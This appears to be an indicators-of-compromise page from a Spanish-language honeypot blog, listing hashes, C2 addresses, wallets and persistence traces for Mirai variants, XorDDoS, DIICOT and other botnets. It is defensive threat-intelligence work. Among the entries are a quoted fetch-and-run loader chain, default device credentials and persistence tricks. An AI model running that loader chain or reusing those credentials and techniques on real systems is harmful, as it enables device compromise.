Bitácora de un honeypot perdido
Indicadores
Todo lo que hay que buscar: hashes, direcciones, dominios, claves y cadenas de cada bicho que ha caído en el cebo, con el capítulo donde se explica de dónde sale cada uno.
Si has llegado aquí buscando un hash o una dirección, esto es lo que hay. Cada indicador viene de un análisis publicado, y el enlace de la derecha lleva al capítulo donde se explica de dónde sale y qué significa — que es lo que una lista, por sí sola, nunca dice.
Las URLs van ofuscadas a propósito (hxxp://, [.]): identifican igual y no se pinchan sin querer. Las IPs y los dominios se dan tal cual, que para eso son indicadores.
KHserver cap. 11 · cap. 12
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | f7134ec664ca003c740337cf7b2fbba1162430d86ca1d7a2b5c14fe0463d261b | cargador handshakebins.sh fuente → |
| sha256 | b297dc8f54f612f92c26735ab50e1360057df3909556d85e6439e695aa646148 | bot · Renesas SH (servido como ARMV4L) fuente → |
| sha256 | 0658e79b91e732723b540ee7040eb0289c497f781d750e42b25dfcf10d233f50 | bot · ARM (servido como MIPS) fuente → |
| sha256 | 5a21c34ff54ab1a92246b9cfba815ed187fe636b9350d41e26c5e4aa8f4bf891 | bot · ARM EABI4 (servido como X86_64) fuente → |
| ip | 45.95.168.149:888 | centro de mando · MAXKO d.o.o., AS211619 fuente → · mi reporte ↗ |
| ip | 213.232.114.14 | servidor de payload · VirMach/xTom, AS3214 fuente → |
| ip | 45.135.194.26 | IP atacante · Pfcloud UG, AS51396 fuente → |
| url | hxxp://213.232.114[.]14/handshakebins.sh | descarga del cargador fuente → |
| cadena | KHserverHACKER · KHcommSOCK | marcas internas del binario fuente → |
| cadena | echo PAYLOAD_EXECUTED | baliza tras infectar fuente → |
| cadena | REPORT EXPLOIT %s %s:%d | protocolo del C2 fuente → |
| cadena | 4E/x31/x6B/x4B/x31/x20… | carga de UDPBYPASS, heredada de SBIDIOT (2021) fuente → |
| cadena | khugepaged · kthreadd · kworker · systemd · dbus-daemon | nombres de proceso que suplanta fuente → |
| cadena | Aboriginal Linux | toolchain cruzado con el que se compiló fuente → |
Sysorbit cap. 7 · cap. 8
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | 31de5c5d0a3483e831e4f9348d46b3c5309177a7f9d6da537fc970f57f103901 | sysorbit.apk fuente → |
| dominio | orbitcnc.twilightparadox.com | C2 activo → 176.65.139.248:10293 fuente → · mi reporte ↗ |
| dominio | updatemc.twilightparadox.com | C2 activo → 176.65.139.248:10293 fuente → · mi reporte ↗ |
| dominio | udpatetbl.duckdns.org · coxm.duckdns.org | C2 de reserva (dormidos) fuente → |
| ip | 176.65.139.248 | distribución y C2 · puerto 10293 fuente → · mi reporte ↗ |
| token | ORBIT_BOT_AUTHVXJUACFHAVBA | token de autenticación contra el C2 fuente → |
| cert | 01:B9:F7:13:02:D0:B1:39:3B:B3:EC:FA:B8:1E:9B:B9:6F:C6:58:33:0A:18:15:EE:C9:32:C0:D9:F2:E8:5C:E9 | certificado que suplanta a una empresa española fuente → |
| cadena | com.sysorbit.service.security | paquete Android fuente → |
| cadena | sysorbit_watchdog · sysorbit_native_lock | sockets abstractos fuente → |
RedTail cap. 5 · cap. 6
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | f0aa83bbbd2c75e2f71ec16029ee5fcfad59f3a8efa30a500b815f0f6c18d987 | minero x86_64 fuente → |
| sha256 | d1cac82f44b54b0fd244a9e4122811e9ae108a197c7a65a20fd2e7552683e68e | minero aarch64 fuente → |
| sha256 | 3f3bf218089d1488617d37f8a5116bb2791eb39ce06a1b5bc9a4cdfe5e94dd39 | minero riscv fuente → |
| sha256 | 3f3a11bafabb1a35db913cfe51995f2e357d049e268860175876ae5a93d23892 | script de limpieza fuente → |
| ip | 217.60.195.113 | servidor de reparto · usuario SFTP dlr fuente → |
| ip | 103.46.186.105 | IP atacante fuente → |
| clave | ed25519 · comentario dlr@sftp | clave privada que planta para descargar el payload fuente → |
| sha256 | 0db4656687a425c47d19000db866db52c7e415dbfaf6b5c651adcb9275ab23ca | la llave privada, tal cual la escribe en disco fuente → |
| sha256 | ae8d459595257f2f22c9d1ff74c4fb8a91643fad7899b57556496716692b904e | el sshcfg que la acompaña · StrictHostKeyChecking no fuente → |
| cadena | auth_ok · redtail_bot_telnet_ok | balizas fuente → |
| puerto | 2137/TCP | puerto de sus pools de minado fuente → |
| ruta | /var/build/redtail/scripts/x86_64-build/ | ruta de compilación dentro del binario fuente → |
Mirai cap. 3 · cap. 4 · cap. 17
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | bf0aabf517685756f16b22f4b1907113a1cd160fa7b5ee384cb554b42b311841 | bot x86-64 fuente → |
| sha256 | 8bdbe21eafc7223a75ea9d075237d389e0c39f6370721f1ea36214989e5bab63 | bot ARM fuente → |
| sha256 | 5c502903694591a219ca263247c4c159967c5838c9a85641f3fb908b983d1e32 | bot MIPS (BE) fuente → |
| sha256 | a75a98641037e42abb4c543d90e81dafdae3b27e90972b705a2e9242a5bee123 | bot MIPS (LE) fuente → |
| sha256 | 9d44d4d051f6aa3fbc95fab0aae818347a602d655fa7f1fba6267e728d7ff2d3 | bot PowerPC fuente → |
| sha256 | abda6887930f4e2e1047b39adf23bbf8bdee9e15c7e2101245bb690be7d80488 | bot SPARC fuente → |
| sha256 | 3366350561c41f5d15994244bfd7358ca256d16a1e954d7a986bd4d2d50c895e | bot Motorola m68k fuente → |
| sha256 | 41ac975aa0638b879bade9f672fbcdacb303bc6ceb5e92083b85af9cd440cd04 | bot Renesas SH fuente → |
| dominio | kappadocia.net | C2 → 141.98.10.50 fuente → |
| ip | 5.182.210.174 | servidor de reparto (FileServer en Go) fuente → |
| dominio | cc.nhancute.site | C2 · puerto 47925 → 160.250.181.124 (la misma caja que reparte) fuente → |
| ip | 160.250.181.124 | reparto y C2 · VPSRE, Vietnam, AS150895 fuente → |
| ip | 160.250.181.123 | IP atacante por ADB · barre y luego carga fuente → |
| url | hxxp://160.250.181[.]124/k7m2q9xa/ | directorio de reparto (12 arquitecturas) fuente → |
| url | hxxp://160.250.181[.]124/b4k9zp[.]sh | dropper (los otros dos: a7m2qx.sh, c8r3nv.sh) fuente → |
| sha256 | e60423da9b1484739cf0b7b883f2b74c9b9acab07e9db90c468960a691650fb1 | bot ARM · servido como «arm» fuente → · mi muestra ↗ |
| sha256 | 873072018241d6efac32e47b8061d76f4b124ba6e6ab69609714f814b2a97f46 | bot ARM · servido como «arm5» fuente → · mi muestra ↗ |
| sha256 | ee7c389272eed8a12562f29c985b93d2273ffff0cced791bd51e7ebe3ffe7ab0 | bot ARM EABI4 · servido como «arm6» fuente → · mi muestra ↗ |
| sha256 | 239751754b0a33534fb3370d70a85cf409d346fb50fb96819756313958f7e4f2 | bot ARM EABI4 · servido como «arm7» fuente → · mi muestra ↗ |
| sha256 | b08b41923efe6973da9c9782fd32df33bdd2b6f61ca421918b111bf9fc839098 | bot Motorola 68020 · servido como «m68k» fuente → · mi muestra ↗ |
| sha256 | 904d5309b45a0691ec526de4daac7a039c717e933e0f4410e1eb6a9e82275764 | bot MIPS (BE) · servido como «mips» fuente → · mi muestra ↗ |
| sha256 | 35574f2eb27f869415538a0e85531fa225416fc4e2b9e323d37bbcd519088b25 | bot MIPS (LE) · servido como «mpsl» fuente → · mi muestra ↗ |
| sha256 | 0a8f44e98e4a87e20cf492dfab870d8067d31e4650a9200d55545eb13cfc48b5 | bot PowerPC · servido como «ppc» fuente → · mi muestra ↗ |
| sha256 | 2f468807a88b41d0386960ed7cf48ea6a3bc1222ff1139cf8ca6194cec62737d | bot SPARC · servido como «sh4» fuente → · mi muestra ↗ |
| sha256 | 07fe68558b309c5537d7f751a879cb64baa0960f28eb2e86c27076d7e219be4c | bot Renesas SH · servido como «spc» fuente → · mi muestra ↗ |
| sha256 | 6502ee33f11f99c9e52e10d301275e61e85065643c3628387e7436ca9b0fc9e5 | bot Intel i386 · servido como «x86» fuente → · mi muestra ↗ |
| sha256 | 1bf4366ad6b382991c6b8c68b4863e9bafcc8e9533867b0e17b1d5825689c143 | bot x86-64 · servido como «x8664» fuente → · mi muestra ↗ |
| cadena | top1hbt | marcador de campaña (top1hbt.<arch>, lo que cada bot re-sirve) fuente → |
| cadena | /var/Condi · condi2 %s:%d · webserv | autoidentificación de la familia fuente → |
| clave | table_key = 0x6d53d2c2 | config XOR · clave efectiva de 1 byte 0x2e (borra los puntos del dominio) fuente → |
| cadena | 66 99 66 | cabecera de la trama bot↔C2 + longitud (2 B) + carga (ping, condi2 webserv:<puerto>) fuente → |
| cadena | Server: Apache · User-Agent: Update v1.0 | httpd falso de cada bot, en puerto alto aleatorio fuente → |
| ruta | /sbin · /usr/sbin · /bin · /usr/bin × reboot, shutdown, poweroff, halt | 16 rutas borradas con unlink desde main (el Condi público cubre 8) fuente → |
| ip | 45.198.224.26 | IP atacante (loader) fuente → |
| cadena | milnetv4 · marcador .anime | variante y marcador de la familia fuente → |
| clave | XOR de 1 byte · 0x54 | cifrado de la configuración fuente → |
| cadena | /home/landley/aboriginal/… | huella del toolchain cruzado Aboriginal Linux, el que venía con la fuga del código de Mirai en 2016 · a la vista en el único binario del lote sin stripear fuente → |
XorDDoS cap. 1 · cap. 2
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | 6f45c6d9c70d97f695cb7bbef362812a17f8ed4d37dafc342c26c86ed9b43638 | bot fuente → |
| url | hxxp://169.239.130[.]20/new.php | servidor de distribución (loader) fuente → |
| dominio | sys-kernel-update.to | C2 vivo → 141.98.11.51 · puerto 1529 fuente → |
| dominio | telemetry-pipe.sh · api-metadata-v6.is | C2 de reserva (dormidos) fuente → |
| ip | 141.98.11.51 | C2 activo · HostBaltic, AS209605 (LT) — la IP rota dentro del ASN: en junio era 141.98.10.115. Lo que perdura es el par dominio + ASN fuente → |
| clave | BB2FA36AAA9541F0 | clave XOR de 16 bytes de la config fuente → |
| ruta | /etc/cron.hourly/gcc.sh · /var/run/gcc.pid | persistencia fuente → |
| cadena | wget→good · curl→cool | renombra las herramientas para cegar a la competencia fuente → |
| ruta | /usr/lib/libudev.so | se copia ahí al arrancar · mismo SHA-256 que la muestra fuente → |
| ruta | /usr/bin/<diez letras al azar> | copia con nombre aleatorio · hash DISTINTO al de la muestra (visto: nhwqrnmkhg, frxuyzisvv) fuente → |
| cadena | crond · /usr/sbin/gdm3 · rpc.statd · automount · rpc.idmapd · /sbin/audispd | demonios que suplanta falseando argv[0] · el nombre que ve el núcleo sigue siendo el real fuente → |
Trinity cap. 13 · cap. 10
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | 76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64 | propagador (trinity) · ofuscado con OLLVM fuente → |
| sha256 | a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437 | endat · contenedor autoextraíble (APK + script + minero) fuente → |
| sha256 | d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0 | xig · lanzador (153 KB) fuente → |
| clave | 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr | cartera de Monero del operador fuente → |
| ip | 139.99.9.133:5555 | pool de minado activo · OVH SAS, Singapur fuente → · mi reporte ↗ |
| ip | 78.46.89.102:7777 | pool de reserva · Hetzner, Alemania fuente → · mi reporte ↗ |
| ruta | /system/bin/debuggerd (original → debuggerd64_real) | persistencia: suplanta el gestor de fallos de Android fuente → |
| cadena | com.google.time.timer · com.android.good.miner · com.google.test.test | mineros rivales que desinstala fuente → |
| sha256 | 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 | APK fuente → |
| md5 | 8844985fcd57b0311d1d4cb2ec13a1ef | APK fuente → |
| cadena | com.ufo.miner · com.example.test.MainActivity | paquete y actividad fuente → |
| clave | fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE | clave de Coinhive (el servicio cerró en 2019) fuente → |
| ruta | /data/local/tmp/ufo.apk | ruta de instalación por ADB fuente → |
VoIP cap. 9
| Tipo | Indicador | Contexto |
|---|---|---|
| ip | 172.110.223.49 | inundación INVITE · UA pplsip · AS23470 ReliableSite (US) fuente → |
| ip | 94.26.31.62 | inundación INVITE · UA VOIP · AS29802 Hivelocity (US) fuente → |
| ip | 23.111.166.26 | inundación INVITE · UA Cisco-SIPGateway falsificado fuente → |
| ip | 158.51.78.101 | fuerza bruta REGISTER · Turquía fuente → |
| ip | 185.114.48.195 | fuerza bruta REGISTER · AS199792 ClearStack (NL) fuente → |
| cadena | pplsip · friendly-scanner · Cisco-SIPGateway (spoof) | user-agents SIP maliciosos fuente → |
Cling cap. 18 · cap. 19 ⬇ YARA
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | 1631e63ee373601c1f42f2674f996fc6c14dc6aebe45ca5d2395bf347a0e3661 | bot · aarch64 (los hashes caducan: el operador recompila) fuente → |
| sha256 | 1b831a9366cd53a4127f885dab247bc2f0b3f661a7d9d9510bbd0a9f150bfb27 | bot · i686 fuente → |
| sha256 | 52bff4bf58eb6031c16763b12b696e849a38f36e69c55402a444819cb9c1bc0e | bot · i586 fuente → |
| ip | 85.11.167.132 | nodo infectado que atacó el cebo por Telnet fuente → |
| url | hxxp://118.145.196[.]225:800/ | servidor de reparto (wget.sh + un binario por arquitectura) fuente → |
| cadena | clingwashere | User-Agent al propagarse por el puerto 7547 (TR-064) fuente → |
| ruta | /root/.cling · /usr/local/bin/.cling · .cling en inittab/rcS/rc.boot | persistencia en disco fuente → |
| cadena | firma de red: STUN a 13 servidores casi a la vez · transaction ID a cero · baliza (etiqueta + 26 B) cada 5 s | lo que de verdad caza a Cling: su comportamiento, no el hash fuente → |
| cadena | firma del escáner: SYN salientes con puerto de origen fijo 9999 | un escaneo normal deja el puerto de origen al azar; este lo clava fuente → |
| cadena | 127.0.0.1:33957 en escucha | cerrojo local de instancia única fuente → |
| cadena | suplantación de init: /proc/<pid> que es bind mount de /tmp, idéntico a /proc/1 | pregunta quién es y el kernel contesta «init» fuente → |
| cadena | órdenes UDP disfrazadas de STUN, sin autenticación (deducido) | el bot no comprueba quién manda; no sirve como firma de red fiable fuente → |
| ip | 145.249.115.184 | el buzón del operador (ago-2026) · AS215540 · monocultivo: 71/71 ficheros que le hablan son malware, 0 benignos fuente → |
| ip | 94.154.43.158 | C2 anterior (jul-2026) · en un /24 que salta de ASN; hoy AS219502 (Storm) fuente → |
| dominio | boymoder.ddns.net | C2 de 2025 · DNS dinámico fuente → |
IranBot cap. 21 · cap. 22
| Tipo | Indicador | Contexto |
|---|---|---|
| ip | 176.65.139.206 | una sola máquina hace de todo: ataca, reparte (:80) y es el C2 (:2000) · AS219502, Storm Industries fuente → |
| ip | 176.65.139.206:2000 | C2 en claro, sin cifrar y sin dominio (revelado en el cap. 22) fuente → |
| url | hxxp://176.65.139[.]206/cat.sh | servidor de reparto (cat.sh + iran.<arch> para 14 arquitecturas) fuente → |
| credencial | telnet / telnet | credenciales con las que entró al cebo (root/icatch99 falló) fuente → |
| cadena | catloader | etiqueta de campaña en argv del cargador fuente → |
| cadena | Not a mirai at all · Death to israel · selfrep.realtek | marcadores de familia en las cadenas del binario fuente → |
| cadena | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://<ip>/cat.sh; chmod cat.sh; sh cat.sh | cadena de infección del cargador (aguanta entre recompilaciones) fuente → |
| cadena | Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/58.0.3029.110 | User-Agent fijo de su método httpmode= fuente → |
| cve | CVE-2021-35394 | Realtek Jungle SDK (UDP 9034), uno de sus dos vectores de propagación fuente → |
| cadena | puertos fijos: 2000 (mando) · 9034/udp (Realtek) · 23 (escáner telnet) | los lleva incrustados el binario fuente → |
| ruta | /etc/init.d/xs.main · /etc/rc.local | persistencia (documentada por su ficha en VirusTotal) fuente → |
| sha256 | 6a4503094d0031ae36c8b27cc36696087831901dfa421675ccb7509c9d7e58da | cargador cat.sh (1.903 B) — los hashes caducan: recompila fuente → |
| sha256 | f35bf04216d14180f9d28f6770a5722557f4a979d746f4ef664419363d0b755b | bot · x86-64 fuente → |
| sha256 | 3f21d6f8621e38d2bc923dfaaf0861887c6ca0def522ae4dea0f9b840bf1d39a | bot · m68k fuente → |
| sha256 | 064d93495573a536517fa7ddf9fb6d3c4cddd4c7fdc61d4f90d12629cad690e6 | bot · MIPS fuente → |
| sha256 | ce452891a6e017f2523f8c7005df1180003ab3e96916774efb432bcc2a8e657f | bot · MIPSEL fuente → |
| sha256 | b1a6dba6636b519d76d7219f6264ac9f1456681c0855baef954fb435d3e25ce5 | gemelo x86-64 (164.272 B) usado en el análisis diferencial · C2 103.83.87.122:8060 fuente → |
| dominio | femboys.chloebulldog.online:44510 · mythickass.onthewifi.com:313 · 103.83.87.122:8060 | C2 anteriores de la familia (contexto) fuente → |
DIICOT cap. 23 · cap. 24 · cap. 25 · cap. 26 · cap. 27 · cap. 28
| Tipo | Indicador | Contexto |
|---|---|---|
| sha256 | a151d3f4f2422531f30a843ffb35479596c86722bb103bdf8591105687f9b125 | minero · el binario que se bajó y se ejecutó como .16 fuente → |
| ip | 92.118.39.77 | IP de origen · segunda visita fuente → |
| ip | 62.171.133.1 | IP de origen · tercera y cuarta visita, la misma reincidente fuente → |
| url | hxxp://5.189.149[.]171/f/brute/m/.16_<arch> | servidor de reparto · ruta estructurada campaña/tipo/arquitectura fuente → |
| cadena | function top() en ~/.bashrc que filtra la salida por sed borrando 16, libbase.sh y un número variable | backdoor de shell · el comando top miente fuente → |
| ruta | 16 · /dev/shm/.16 · /root/.16 | nombre de proceso y de fichero del minero fuente → |
| ruta | system-helper · /etc/cron.d/cron_d_<n> · /etc/ld.so.preload · /root/.profile | persistencia · cinco vías a la vez fuente → |
| clave | 89PNDJssF3RbL6m7aSydYB4tLrvjZ28Cr8n4LucmFHat8botWkWr6oDPEaSHfeZn4wfA3dC5QsE7nZV1P6tE81sK2i9heam | cartera de Monero en uso fuente → |
| ip | 169.58.248.162:443 | proxy de minado · sin TLS; indicador extraído, no conexión observada fuente → |
| ip | 5.189.149.171 | servidor de reparto fuente → |
| dominio | project0.cc | dominio del reparto fuente → |
| dominio | pool-{fr,phx,nyc,hk,sg,aus,ca}.supportxmr.com:5555 | pools de reserva · los siete, en claro fuente → |
| clave | XOR de un byte, clave 0x5A | cifrado de la config · barre las 256, puede cambiar entre componentes fuente → |
| ruta | /usr/local/lib/libcommon.so | rootkit · engancha readdir fuente → |
| ruta | /var/tmp/snap · .X0-lock | cargas en disco fuente → |
| cadena | __TTY_GUARD_OK__ | autocomprobación tras escribir el enganche de shell fuente → |
| clave | 87Fxj6UD… | cartera anterior · cobrando desde 2021-01-14, parada el 2026-08-03 fuente → |
| cadena | 16 | nombre de trabajador en el pool · el mismo con el que se camufla en la máquina fuente → |
| ip | 109.160.32.115 | origen de la intrusión · ASN 197170 TechTies fuente → |
| sha256 | 28e0c4d5bc6675537ba47c6529877a3194a29585fb86477f66bf13c79252d2f0 | dropper · Go + UPX, 16,6 MB, con cinco módulos dentro fuente → |
| sha256 | 7d55a90710b8e79283efd756e8d3423fc23e0dcf742d6027b1a2a1b9d02a9c16 | el bot · malla P2P y mando por Telegram fuente → |
| sha256 | 79a47c33335fe1ed871a23cf7972652ee08a3ec0afed1c2dc6b5a8df675e153d | XMRig, sin configurar fuente → |
| sha256 | ffe04bc05a56f78b1273876cf17ded8df1aa3da5a15deb17dce99a3e206eb705 | el loader · motor de persistencia y descarga fuente → |
| sha256 | c1c122869f46aaf8c4e90f3132c93a801c853244c756966952d0bf19241cf084 | segundo minero fuente → |
| ruta | /tmp/{cache,diicot,kuak} · /dev/shm/retea · /dev/shm/.x/{network,pass,bios.txt} | los cinco módulos y su diccionario, en disco fuente → |
| cadena | /tmp/d.log con el contenido «admin» | marca de que la máquina ya es suya fuente → |
| credencial | root:Huawei@123 en el diccionario del escáner | delata a qué cacharros apunta además de a servidores fuente → |
| puerto | TCP 8081 | la malla · escucha y se anuncia; objetivo 2.000 conexiones fuente → |
| ip | 91.92.47.220:8081 | vecino de arranque grabado en el binario fuente → |
| ip | 31.57.105.94:42 | servicio propio del atacante para «cuál es mi IP» fuente → |
| token | 8778142498:AAE2YhxC6AB5PF8GOucHxCviYV4FA1JJnIE | identificador del bot de Telegram · ya cancelado fuente → |
| cadena | User-Agent: skema | no se parece a ningún navegador · buena firma de red fuente → |
| cadena | 6059167279 | número del operador · el único autorizado a dar órdenes fuente → |
| cadena | DIICOT-BOTNET · v2-update-1 | el propio panel de estado dice cómo se llama y su versión fuente → |
| cadena | peers.dat · semilla p2p-peers-salt-v1 | fichero de vecinos de la malla fuente → |
| cadena | myservices.service → /bin/bash /usr/bin/ssshd · RestartSec=1800 | servicio de systemd con nombre de sistema fuente → |
| ruta | /usr/bin/ssshd | con tres eses · es el stager, no el demonio SSH fuente → |
| ruta | /var/tmp/<8 hex>/8b8989e8 | cron de root cada minuto · el directorio cambia en cada infección fuente → |
| cadena | ElPatrono1337 | comentario de la llave SSH que planta en /root/.ssh/authorized_keys fuente → |
| ruta | /tmp/.fontconfig/.fc-cache · /var/tmp/.ladyg0g0/.pr1nc35 · /var/tmp/Documents/.diicot | marcadores en disco fuente → |
| sha256 | 2bcc91fdedb8c583a9fe883be9ad453333a1bba0fdf655474982db3cbb8e7a74 | el stager que baja la configuración de minado fuente → |
| url | hxxp://195.24.237.240/.x/black3 | segunda etapa · caída a 19-sep-2026 fuente → |
| dominio | digital.digitaldatainsights[.]org | respaldo de la segunda etapa · caído fuente → |
| cadena | ladyg0g0 · .pr1nc35 | otros alias del actor, en las rutas que deja fuente → |